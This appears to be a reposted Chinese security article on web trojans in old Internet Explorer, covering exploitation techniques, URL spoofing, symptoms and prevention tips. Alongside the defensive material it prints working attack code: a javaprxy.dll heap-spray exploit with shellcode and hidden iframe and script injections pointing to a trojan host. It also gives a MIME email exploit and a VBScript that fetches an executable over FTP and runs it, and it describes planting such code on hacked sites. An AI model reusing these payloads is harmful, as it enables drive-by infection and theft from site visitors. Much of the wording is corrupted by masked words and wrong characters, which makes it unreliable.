国内资深安全专家详谈网页***

时间 2020-01-31

原文原文链接

诚信网安－－子明

【51CTO.com 专家特稿】当今网络，反病毒软件日益增多，使用的反病毒技术愈来愈先进，查杀病毒的能力逐渐提升，但病毒制做者并不会罢休，反查杀手段不断升级，新的病毒层出不穷，形式也愈来愈多样化，为了躲避查杀，病毒自身的隐蔽性愈来愈高，针对反病毒软件对传统的病毒传播途径的监控能力提升，形成病毒传播困难的问题，愈来愈多的病毒，利用多数反病毒软件产品对恶意脚本监控能力的缺陷，开始利用网页***这一危害面最普遍，传播效果最佳的方式来传播。

一、什么是网页***

网页***是利用网页来进行破坏的病毒，它包含在恶意网页之中，使用脚本语言编写恶意代码，依靠系统的漏洞，如IE浏览器存在的漏洞来实现病毒的传播。当用户登录了包含网页病毒的恶意网站时，网页***便被激活，受影响的系统一旦感染网页病毒，就会遭到破坏，轻则浏览器首页被修改，标题改变，系统自动弹出广告，重则被装上***，感染病毒，使用户没法进行正常的使用。甚至会引发系统崩溃，敏感信息丢失等严重后果。因为脚本语言易于掌握，因此网页***很是容易编写和修改，形成很难提取特征值，增长了杀毒软件查杀以及用户预防的困难。

目前的网页***都是利用脚本语言、ActiveX、WSH等来实现对客户端计算机的远程操做，如改写注册表，添加、删除、更改文件夹等操做。网页病毒能够以此来达到传播的目的。

1.利用WSH(Windows Scripting Host Object Reference)等系统控件

WSH，是“Windows Scripting Host”的简称，能够直译为“Windows 脚本宿主”。在Windows系统中会默认安装，它是内嵌于 Windows 操做系统中的脚本语言工做环境。

Windows Scripting Host 这个概念最先出现于 Windows 98 操做系统。微软在研发 Windows 98 时，为了实现多类脚本文件在 Windows 界面或 Dos 命令提示符下的直接运行，就在系统内植入了一个基于 32 位 Windows 平台、并独立于语言的脚本运行环境，并将其命名为“Windows Scripting Host”。WSH 架构于 ActiveX 之上，经过充当 ActiveX 的脚本引擎控制器，WSH 为 Windows 用户充分利用威力强大的脚本指令语言扫清了障碍。

WSH也有它的不足之处，任何事物都有两面性，WSH 也不例外。WSH 的优势在于它使用户能够充分利用脚原本实现计算机工做的自动化；但也正是它的这一特色，使系统存在了安全隐患。计算机病毒制造者用脚本语言来编制病毒，并利用 WSH 的支持功能，让这些隐藏着病毒的脚本在网络中广为传播。借助WSH的缺陷，经过JAVAScript，VBScript，ActiveX等网页脚本语言，能够改动受影响系统的注册表，利用服务器端脚本程序如：ASP，PHP等来记录访问网页者的相关信息，浏览以后，系统目录被彻底共享;IP地址、访问时间、操做系统名称会被网页***所记录，形成敏感信息的泄露。

2．Microsoft Internet Explorer等浏览器存在漏洞

3．脚本语言

用JAVA编制的脚本语言主要是Java Applet和Java Script。Applet是Java编写的小应用程序，不能独立运行，须要嵌入HTML文件,遵循标准，在支持Java的浏览器(如Microsoft Internet Explorer) 上运行，是Java一个重要的应用分支，它改变了传统网页呆板的界面，在WWW网页(Home Page / Pages)设计中加入了动画、影像、音乐等元素。

JavaScript是一种基于对象(Object)和事件驱动(Event Driven)并具备安全性能的脚本语言。使用它的目的是与HTML超文本标记语言、与Web客户交互做用。从而能够开发客户端的应用程序等。它是经过嵌入或文件引用在标准的HTML语言中实现的。它的出现弥补了HTML语言的缺陷，它是Java与HTML折衷的选择，具备基于对象、简单、安全、动态、跨平台性等特性。

ActiveX是Microsoft提出的一组使用COM(Component Object Model，部件对象模型)使得软件部件在网络环境中进行交互的技术。它与具体的编程语言无关。做为针对Internet应用开发的技术，ActiveX 被普遍应用于WEB服务器以及客户端的各个方面。同时，ActiveX技术也被用于方便地建立普通的桌面应用程序。在Applet中可使用 ActiveX技术，如直接嵌入ActiveX控制，或者以ActiveX技术为桥梁，将其它开发商提供的多种语言的程序对象集成到Java中。与 Java的字节码技术相比，ActiveX提供了“代码签名”(Code Signing)技术保证其安全性。

形成网页病毒传播和造成的主要缘由，是由于Windows操做系统以及Microsoft Internet Explorer等浏览器存在漏洞。

2、网页***的***原理

网页***其实是一个HTML网页，与其它网页不一样的是该网页是***精心制做的，用户一旦访问了该网页就会中***。为何说是***精心制做的呢？因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞，让IE在后台自动下载***放置在网络上的***并运行（安装）这个***，也就是说，这个网页能下载***到本地并运行（安装）下载到本地电脑上的***，整个过程都在后台运行，用户一旦打开这个网页，下载过程和运行（安装）过程就自动开始。
打开一个网页，IE浏览器不会自动下载程序和运行程序，这是由于，为了安全，IE浏览器是禁止自动下载程序特别是运行程序的，可是，IE浏览器存在着一些已知和未知的漏洞，网页***就是利用这些漏洞得到权限来下载程序和运行程序的。下面列举一些IE浏览器等存在的漏洞来分别说明为何利用网页***能够下载程序和运行程序。

1.下载可执行文件.

index里有一个代码漏洞<LINK href="ray.exe" rel=stylesheet type=text/css>，IE会把可执行文件误认为CSS样式表而下载到IE的临时文件目录.

也能够利用<SCRIPT LANGUAGE="icyfoxlovelace" src=" [url]http://test.net/1.exe[/url]"></SCRIPT>这段代码，把这段代码插入到网页源代码的</BODY>…</BODY>之间,运行后就会发如今IE的临时目录Temporary Internet Files下，已经下载了1.exe这个病毒文件。

2.自动运行程序

<SCRIPT LANGUAGE="javascript" type="text/javascript"> var shell=new ActiveXObject("shell.application"); shell.namespace("c:\\Windows\\").items().item("Notepad.exe").invokeverb(); </SCRIPT>

把这段代码插入到网页源代码的</BODY>…</BODY>之间，而后用IE打开该网页，这段代码能够在IE中自动打开记事本。

这段代码使用了shell.application控件，该控件能使网页得到执行权限，替换代码中的“Notepad.exe”（记事本）程序，就能够用它自动运行本地电脑上的任意程序。

经过以上的例子能够看出，利用IE的漏洞，在网页中插入相关的代码，IE彻底能够自动下载和运行程序。

3、可能被网页***利用的漏洞

1．利用URL格式漏洞

此类网页***是利用URL格式漏洞来欺骗用户。构造一个看似JPG格式的文件诱惑用户下载，但事实上用户下载的倒是一个EXE文件。

此类***，具备至关的隐蔽性，利用URL欺骗的方法有不少种，好比起个具备诱惑性的网站名称或使用易混的字母数字掉包进行银行网络钓鱼，还有漏洞百出的“%30%50”之类的Unicode编码等等，如今列举比较常见的几种方法：
(1).＠标志过滤用户名的解析

原本＠标志是E－mail地址的用户名与主机的分隔符，但在URL中一样适用，并且功能一模一样。HTTP（超文本传输协议）规定了URL的完整格式是“[url]Http://Name[/url]：Password＠IP地址或主机名”，其中的“IP地址或主机名”是必填项。＠标志与其前面的“Name： Password”，意为“用户名：密码”，属于可选项。也就是说，在URL中真正起解析做用的网址是从＠标志后面开始的，这就是欺骗原理。

好比用户访问“[url]Http://www.sina.com[/url]＠ [url]www.Trojan.com.cn/HuiGeZi_Server.exe[/url]”，从表面上看，这是新浪网提供的一个连接，用户会认为这是一个无害的连接，而点击，而实际上 “[url]www.sina.com[/url]”只是个写成新浪网址形式的用户名（此处的密码为空），由于后面有＠标志。而真正连接的网址倒是 “[url]www.Trojan.com.cn/HuiGeZi_Server.exe[/url]” 也就是说这个发来的URL地址其实彻底等同于“[url]Http://www[/url] [url]www.Trojan.com.cn/HuiGeZi_Server.exe[/url]，而与前面的用户名毫无关系，只是迷惑性可就大大提升了。即便没有这个用户名，也彻底不影响浏览器对URL的解析。

(2).十进制的IP地址

常见的IP地址包括四个字节，通常表示形式为“xxx.xxx.xxx.xxx”（x表示一个十进制数码），例如“61.135.132.12”。由于数字IP地址较长，且过于抽象、难以记忆，因此采用域名服务DNS来与之对应。在浏览器地址栏中输入“[url]Http://www.sohu.com[/url]”与 “[url]Http://61.135.132.12[/url]”的结果彻底同样，都是访问搜狐网站，由于61.135.132.12就是搜狐域名 [url]www.sohu.com[/url]的IP地址。不过，用 [url]Http://1032291340[/url]访问的话，仍然能够打开搜狐网站，这是由于，四位点分十进制形式的IP地址“61.135.132.12”表明一组32位二进制数码，若是合在一块儿再转换成一个十进制数的话，答案就是1032291340。转换方法，就是数制的按权展开：12×2560＋132×2561＋135×2562＋61×2563 ＝12＋33792＋8847360＋1023410176＝1032291340（基数为256，即28）。在上文的例子中提到了 “[url]www.Trojan.com.cn/HuiGeZi_Server.exe[/url]”。这种字母域名有时还能被用户识破，而在把它对应的IP地址（假设为 “61.135.132.13”）换算成一个十进制数后，结果是1032291341，再结合＠标志过滤用户的解析，就会变成 [url]Http://www.sina.com@1032291341[/url]这样的地址，这样就更加隐蔽了。

(3).虚假的网址，网络钓鱼者注册一个域名和真实网站域名十分类似的网址，其用户界面也和真实网站页面很是类似，而后不URL提供给用户，那么一般的用户被引导到这样的虚拟网址上是难以察觉的，***者也就能够利用该网页来诱导用户输入本身的我的身份信息，达到窃取的目的，例如真实网站域名是 [url]www.lovebank.xxx[/url],伪造网站域名是 [url]www.1ovebank.xxx[/url],一个是小写的"L",一个是数字"1"，域名服务器将解析到彻底不一样的IP地址上，但用户很难看出来。再如真实网站的域名是 [url]www.xxx.xxx.cn[/url]，而虚假网站使用域名 [url]www.xxx.xxx[/url],不少人也没法判断

(4).更隐蔽的方法，是根据超文本标记语言的规则，能够对文字制做超连接，这样就使网络钓鱼者有隙可乘。例如文件源代码能够写成："<A HREF=http://www.xxxbank.com.cn>[url]http://www.xxbank.com.cn</A>[/url]"。这样，屏幕上显示的是xxxbank的网址，而实际却连接到了xxbank的虚假网站。

(5).采用假装手段。能够在浏览器打开虚假网站的时候，弹出一个很隐蔽的小图像，正好覆盖在浏览器显示网址的地方，该小图像显示被仿冒的网站的真实域名，而浏览器真正访问的地址被掩盖在下面。

(6).虚假的弹出窗口。一些虚假网站会将用户转移到真实的网址，可是转移以前制造假冒的弹出窗口，提示用户进行我的登录的操做，不少用户会误认为这些弹出窗口是网站的一部分而进一步按照提示操做，直到透露出本身的我的身份信息。

(7).能够利用浏览器漏洞窃取我的信息，如IE就曾暴露出一个漏洞，该漏洞使***者能够在垃圾邮件中构造一种数据，用户点击后即可使IE浏览器显示的网址与实际访问的网址不一样。采用这种方式进行***，欺骗性更好，能够经过向用户发送包含URL的垃圾邮件的方式，诱骗用户点击，用户若是不检查邮件的原始代码，根本没法知道本身被浏览器欺骗了。

(8).***程序能够修改用户计算机中的HOSTS文件，将特定域名的IP地址设置成本身的虚假网站的地址，用户访问这些网站时，机器会从 HOSTS文件中得到对应的IP。除了上面的方法外，更为隐蔽和目前经常使用的***手法是，***者首先攻破一个正常的网站，而后修改网站的代码，经过跳转语句或嵌入JS脚本的手段，来改造一个挂马的网站，这样当用户点击了包含正常网站的URL时，是不会有戒备心理的，更容易形成更大的损失。

2.经过ActiveX控件制做网页***。

经过 ActiveX 把普通的软件转化为能够在主页直接执行的软件的网页***，此类网页***对全部的系统和IE版本都有效，缺点是浏览网页***时会弹出对话框，询问是否安装此插件。病毒做者一般是伪造微软、新浪、Google等知名公司的签名，假装成它们的插件来迷惑用户。

3.利用WSH的缺陷

利用WSH修改注册表，使IE安全设置中“没有标记为安全的的activex控件和插件”的默认设置改成启用，而后再利用一些能够在本地运行EXE程序的网页代码来运行病毒。它的危害在于，能够利用IE的安全漏洞提高权限达到本地运行任意程序的后果。

4.利用MIME漏洞制作的网页***。

它利用了Microsoft Internet Explorer中MIME/BASE64处理的漏洞，MIME(Multipurpose Internet Mail Extentions)，通常译做“多用途的网络邮件扩充协议”。顾名思义，它能够传送多媒体文件，在一封电子邮件中附加各类格式文件一块儿送出。如今它已经演化成一种指定文件类型(Internet的任何形式的消息：E-mail，Usenet新闻和Web)的通用方法。在使用CGI程序时你可能接触过 MIME类型，其中有一行叫做Content-type的语句，它用来指明传递的就是MIME类型的文件(如text/html或 text/plain)。MIME在处理不正常的MIME类型时存在一个问题，***者能够建立一个Html格式的E-mail，该E-mail的附件为可执行文件，经过修改MIME头，使IE不能正确处理这个MIME所指定的可执行文件附件。IE处理附件的方式：通常状况下若是附件是文本文件，IE会读取文件，若是是VIDEO CLIP，IE会查看文件；若是附件是图形文件，IE就会显示文件；若是附件是一个EXE文件呢？IE会提示用户是否执行，但当***者更改MIME类型后，IE就再也不提示用户是否执行而直接运行该附件。从而使***者加在附件中的程序，***命令可以按照***者设想的状况进行。在Win9X\ME以及 WinNT4和Win2000下的Internet Explorer 5.0、5.0一、5.5均存在该漏洞，微软邮件客户端软件Outlook Express也存在此漏洞。

5．利用系统的图片处理漏洞

这是种只要浏览图片就能够传播的网页***。这种***是把一个EXE文件假装成一个BMP或JPG图片文件,在网页中添加如 <img src="love.bmp" >的代码来欺骗IE自动下载,而后利用网页中的Java Script脚本查找客户端的Internet临时文件夹,寻找下载的BMP格式文件,把它拷贝到TEMP目录.再利用脚本把找到的BMP文件用 DEBUG还原成EXE,并添加到注册表启动项中,达到随系统的目的。

6．HTML文件***

首先利用工具把EXE格式的文件转化成HTML文件的***，这样.EXE文件看起来就变成了Htm文件，欺骗访问者访问假冒的Htm文件从而达到运行病毒的目的。它和BMP网页***运用了同一个原理，也会利用JAVASCRIPT脚本和debug程序来转换回EXE文件。

7．Hta***

Hta网页***，是利用Internet Explorer Object Data（MS03-032）漏洞制做的网页***，此漏洞是由于Internet Explorer在处理对象"Object"标记时没有正确处理要被装载的文件参数。（"Object"标记用于插入ActiveX组件等对象到HTML 页面。"Object"标记的"Type"属性用于设置或获取对象的MIME类型。一般合法MIME类型包括"plain/text"或 "application/hta", "audio/x-mpeg"等。）Internet Explorer指定远程对象数据位置的参数没有充分检查被装载的文件属性，***者能够构建恶意页面，诱使用户访问来运行恶意页面指定的程序。

8.利用CHM格式漏洞。

这种网页***首先建立一个Htm文件，包含以下代码：<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' wight =0 height =0 CODEBASE='x.exe'>而后用电子书制做工具将包含名为x.exe的病毒文件该文件的文件夹编译成CHM文档。新建一个包含以下代码的 Htm文件。

<title>hello</title>
<textarea id="code" style="display:none;" >
<object data="ms-its:mhtml:file://C:\foo.mht!${lhxy}/x.chm::/x.htm" type="text/x-scriptlet"></object>
</textarea>
<script language="javascript">
document.write(code.value.replace(/\${lhxy}/g,location.href.substring(0,location.href.indexOf('mm.htm'))));
</script>

就达到了调用挂病毒的目的。

9.IFRAME溢出

IE IFRAME漏洞利用了MS05020中提到的IE溢出漏洞， IE在处理iframe标签的时候，会调用一个叫做SHDOCVW！CBaseBrowser2：：SetFramName函数来进行unicode copy（wcscpy），在拷贝iframe的name时，没有进行边界检查，构造恶意的代码就会致使IE的溢出。IE产生溢出错误后，可能会被***利用打开电脑中某个端口。当微软的IE窗口打开另外一个窗口时，若是子窗口是另外一个域或安全区的话，安全检查应当阻止父窗口访问子窗口。但事实并不是如此，父窗口能够访问子窗口文档的frame，这可能致使父窗口不管是域或安全区都能在子窗口中设置Frame或IFrame的URL。这会带来严重的安全问题，通过设置URL指向Javascript协议，父窗口能在子域环境下运行脚本代码，包括任意的恶意代码。***者也能在“个人电脑”区域中运行脚本代码。这更会形成严重的后果。

10. Microsoft Internet Explorer Javaprxy.DLL COM对象堆溢出漏洞

Microsoft Internet Explorer存在一个堆溢出漏洞。当一个恶意的网页实例化'javaprxy.dll' COM对象时，可能致使堆溢出，成功利用该漏洞可以在客户端上下载执行任意代码。其测试代码以下：

<!--
注：这个漏洞利用代码是用PERL脚本生成的可用HTM网页文件，以网页形式保存，打开后若是执行成功，将会监听28876端口

-->
<html><body>
<SCRIPT language="javascript">
shellcode = unescape("%u4343"+"%u4343"+"%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");
bigblock = unescape("%u0D0D%u0D0D");
headersize = 20;
slackspace = headersize+shellcode.length
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<750;i++) memory[i] = block + shellcode;
</SCRIPT>
<object classid="CLSID:03D9F3F2-B0E3-11D2-B081-006008039BF0"></object>
Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit

4、网页***的基本用法

理解了网页******的原理，以及经常使用的漏洞，就能够写出相关的利用代码。制做出网页***，而后就是传播网页***，目前网页***的主要传播途径是：

1．经过IM及时聊天软件传播

将包含网页***的地址（网址）经过QQ等聊天软件在网络中分发，一旦有用户访问了该网页，该网页就会在系统中自动下载并运行放置在网络上的***。

2．***知名网站，得到Webshell权限后，在网站中填加恶意代码，如：
（1）iframe
<iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe>

注：<iframe>也叫浮动帧标签，它能够把一个HTML网页嵌入到另外一个网页里实现“画中画”的效果，被嵌入的网页能够控制宽、高以及边框大小和是否出现滚动条等。在上述代码中，由于把宽（width）、高（height）、边框（frameborder）都设置为了“0”，因此，上述代码插入到门户网站的首页后，网站的首页不会发生变化，可是，因为嵌入的网页实际上已经打开了，因此网页上的下载***和运行***的脚本仍是会随着门户首页的打开而执行的。

（2）js挂马
<script src=http://www.xxx.com/muma.js></script>

（3）js变形加密
<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
其中muma.txt可改为任意后缀的。

（4）嵌入
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src=" [url]http://www.xxx.com/muma.htm/[/url]"></iframe>';

利用在知名门户网站，填加恶意脚本的***行为不少，例如，安天实验室在06年8月份就发现了针对KFC肯德基，雪花啤酒，迈拓硬盘等知名网站的***行为。所采用的都是此种方式。

3.利用美丽的网页名称及内容，诱惑用户访问。

不少恶意网页或是站点的制做者，对浏览者的心理进行了分析，对域名的选择和利用很是精明。不少网民对一些×××信息比较感兴趣，成为了他们利用的渠道。他们会构建名 [url]www.love.com[/url]，或是 [url]http://bangbus.year.net[/url]等具备诱惑性的名称诱惑用户点击。

4.利用电子邮件等传播。

***者，利用电子邮件群发工具，发送包含诱惑性信息的主题邮件，诱惑用户点击其中包含的网页。

5、目前经常使用的网页***制做方式

1.Javascript.Exception.Exploit
利用JS+WSH的完美结合，来制做恶意网页。

2.错误的MIME Multipurpose Internet Mail Extentions，多用途的网际邮件扩充协议头.几乎是如今网页***流行利用的基本趋势，这个漏洞在IE5.0到IE6.0版本中都有。

3.EXE to .BMP + Javascritp.Exception.Exploit用虚假的BMP文件诱惑用户运行。

4.iframe 漏洞的利用

当微软的IE窗口打开另外一个窗口时，若是子窗口是另外一个域或安全区的话，安全检查应当阻止父窗口访问子窗口。但事实并不是如此，父窗口能够访问子窗口文档的frame，这可能致使父窗口不管是域或安全区都能在子窗口中设置Frame或IFrame的URL。这会带来严重的安全问题，经过设置URL指向 javascript协议，父窗口能在子域环境下运行脚本代码，包括任意的恶意代码。***者也能在“个人电脑”区域中运行脚本代码。这更会形成严重的后果。

5.经过安全认证的CAB,COX

此类方法就是在.CAB文件上作手脚，使证书.SPC和密钥.PVK合法

原理：IE读文件时会有文件读不出，就会去“升级”这样它会在网页中指定的位找 .cab 并在系统里写入个CID读入.cab里的文件。

方法：.cab是WINDOWS里的压缩文件， IE里所用的安全文件是用签名的，CAB也不例外，所作的CAB是通过安全使用证书引入的。也就是说IE认证***，之因此每次都能***，是由于它经过的是IE认证下的安全***。

6.EXE文件的捆绑

如今的网页***捆绑机几乎是开始泛滥了，多的数不胜数。再将生成的MHT文件进行加密。

6、经常使用网页***运行原理的分析

1.Javascript.Exception.Exploit

经常使用的***代码：
<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>
Function destroy(){
try
{
//ActiveX initialization 初始化ActiveX，为修改注册表作准备
a1=document.applets[0];
//获取applet运行对象，如下语句指向注册表中有关IE的表项
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
开始进行破坏
}
}
catch(e)
{}
}
catch(e)
{}
}
function do()
{
//初始化函数，并每隔一秒执行修改程序
setTimeout("destroy()", 1000); //设定运行时间1秒
}
Do() //进行破坏的执行函数指令
这个代码是JAVAScript编写，很简单，但却能够修改受影响系统的注册表，释放垃圾文件，格式化硬盘等。

2.错误的MIME Multipurpose Internet Mail Extentions,多用途的网际邮件扩充协议头
经常使用的***代码：

<! - - x.eml - - >
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====B===="
--====B====
Content-Type: multipart/alternative;
boundary="====A===="
--====A====
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable
<iframe src=3Dcid:Mud height=3D0 width=3D0></iframe>
--====A====--
--====B====
Content-Type: audio/x-wav;
name="run.exe"
Content-Transfer-Encoding: base64
Content-ID: <Mud> ---如下省略AAAAA N+1个---
把run.exe 的类型定义为audio/x-wav，这是利用客户端支持的 MIME(多部分网际邮件扩展，Multipart Internet Mail Extension) 类型的漏洞来完成的。当申明邮件的类型audio/x-wav时，IE存在的一个漏洞会将附件认为是音频文件自动尝试打开，，结果致使邮件文件x.eml 中的附件run.exe被执行。在win2000上，即便是用鼠标点击下载下来的 x.eml，或是拷贝粘贴，都会致使x.eml中的附件被运行。整个程序的运行仍是依靠x.eml这个文件来支持。Content-Transfer- Encoding: base64 Content-ID: <Mud> 从中能够看出，因为定义后字符格式为base64，那么一下的代码所有为加密过的代码，里面能够是任何执行的命令：
〈script language=vbs〉
On Error Resume Next•　容错语句，避免程序崩溃
set aa=CreateObject（"WScript.Shell"）•创建WScript对象
Set fs = CreateObject（"Scripting.FileSystemObject"）•创建文件系统对象
Set dir1 = fs.GetSpecialFolder（0）•获得Windows路径
Set dir2 = fs.GetSpecialFolder（1）•获得System路径
……省略……</script>
之因此有的病毒不能准确的清除所有的病毒体，是由于不少杀毒软件，病毒监控只杀当时查到的，却不能处理新建的文件。

3.Iframe 漏洞的利用

经常使用***代码：
（1）
<script language="jscript">
　　 () {
　　　　var
　　oVictim=open(" [url]http://url.url.com/url?threadm=vir[/url]","OurVi
ctim","width=100,height=100");
　　　　setTimeout(
　　　　　　function () {
　　　　　　　　oVictim.frames[0].location.href="javascript:alert(document.cooki
　　e)";
　　　　　　},
　　　　　　7000
　　　　);
　　}
　　</script>

（2）
〈iframe src=run.eml width=0 height=0〉〈/iframe〉
常见的***运用格式，高度和宽度为0的一个框架网页。

（3）
<object type="text/x-scriptlet" width="0" height="0" data="test.html"></object>
一个框架引用的新方式，对type="text/x-scriptlet" 的调整后，就能够实现和eml格式文件一样的效果。

4.Microsoft Internet Explorer浏览器弹出窗口Object类型验证漏洞的利用

常见***代码：
<object data="run.asp"></object>
----- code cut start for run.asp -----
<HTA:APPLICATION caption="no" border="none" showInTaskBar="no" windowState="minimize">
<object id=';wsh'; classid=';clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B';></object>
<script language="VBScript">
Dim fs, t
Set fs = CreateObject("Scripting.FileSystemObject") //注册组件FSO
Set t = fs.CreateTextFile(" ftp.txt",True)
t.WriteLine("userdown")
t.WriteLine("username")
t.WriteLine("usepassword")
t.WriteLine("get ie.exe c:window.exe") //FTP下载一个文件，并进行假装
t.WriteLine("close")
t.WriteLine("quit")
t.Close
wsh.Run "ftp -n -s:ftp.txt URL.url.com",0,true
wsh.Run "c:window.exe" //下载完毕后就运行
fs.DeleteFile " ftp.txt",true //下载列表文件用完就删
window.close //窗口关闭，全部任务结束
</script>
----- code cut end for run.asp -----

7、网页***运行后特征分析

1.系统的默认主页被更改，而且IE工具栏内的修改功能被屏蔽掉；

2.在系统的桌面上无端出现陌生网站的连接，不管怎么删除，每次开机都依旧会出现，若是单击鼠标右键，出现的工具栏中有也会有大量陌生网站的连接；

3.系统桌面及桌面上的图标被隐藏；

4.注册表编辑器被锁定，从而没法修改注册表；

5.上网以前，系统一切正常，下网以后系统就会出现异常状况，如系统盘丢失、硬盘遭到格式化等；

6.上陌生网站后，出现提示框“您已经被XX病毒***”，以后系统出现异常；

7.登录站点后，出现一个窗口迅速打开后又消失的现象，系统文件夹内出现异常文件；

8.系统的进程中出现未知进程，并且没法终止，终止后会自动从新出现；

9.系统CPU占用率高；

10.登录某站点后，杀毒监控软件报警，并删除病毒文件，位置在IE的缓冲区。从新启动计算机后发现IE默认设置被修改。

11.自动弹出广告；

12.信用卡，QQ账号丢失等；

8、网页***的预防

1. 避免浏览包含不健康内容的网页；

2. 因为网页***是含有害代码的ActiveX网页文件，所以在IE设置中将ActiveX插件和控件、Java脚本等所有禁止。
具体方法是：在IE窗口中点击"工具→Internet选项，在弹出的对话框中选择"安全"标签，再点击"自定义级别"按钮，就会弹出"安全设置"对话框，把其中全部ActiveX插件和控件以及Java相关所有选择"禁用"便可。不过，这样在网页浏览过程当中可能会形成一些正常使用ActiveX的网站没法浏览。

3.对Windows 2000和WINDOWS XP用户，还能够经过在服务里，禁用远程注册表操做服务"Remote Registry Service"，来对付该类网页。具体方法是：点击"管理工具→服务→Remote Registry Service(容许远程注册表操做)"，禁用便可。

4.升级浏览器到IE6.0并及时安装升级补丁。

5.下载微软最新的Microsoft Windows Script

6. 安装反病毒软件以及防火墙，打开网页监控和脚本监控.

后记：

网页***，目前的发展方向，是利用操做系统，浏览器存在的溢出漏洞，来下载Trojan-Downloader类***，达到传播病毒的目的。而网页 ***的传播方式，目前，主要是******知名网站，在代码中填加恶意脚本，从而达到，利用知名网站，访问量高的特色，快速传播的目的。网页***自己的危害巨大，但它带来的最大影响，是可能传播恶性的病毒，形成极大的危害。
经过最近的这些病毒分析，如今愈来愈多的***者采起网页挂马，来达到控制更多的 “肉鸡”从而达到，靠流量和贩卖“肉鸡”来达到收入最大话，经过网站钓鱼，来捕获受害人的信用卡账号以及我的隐私，更有甚者进行非法交易，出卖给一些商业间谍等，之后的病毒防范和研究工做还将继续进行下去，任重而道远。

欢迎你们和我交流，咱们一同来打一场反黑反病毒的持久战，同时在这里我仍是要感谢安天实验室的全体cert组成员，能全力支持我，配合我来更快更好的完成病毒分析工做，也一样感谢个人两个助手-----王清，王琪，以及诚信网安的全体成员，谢谢大家对我工做的支持和帮助。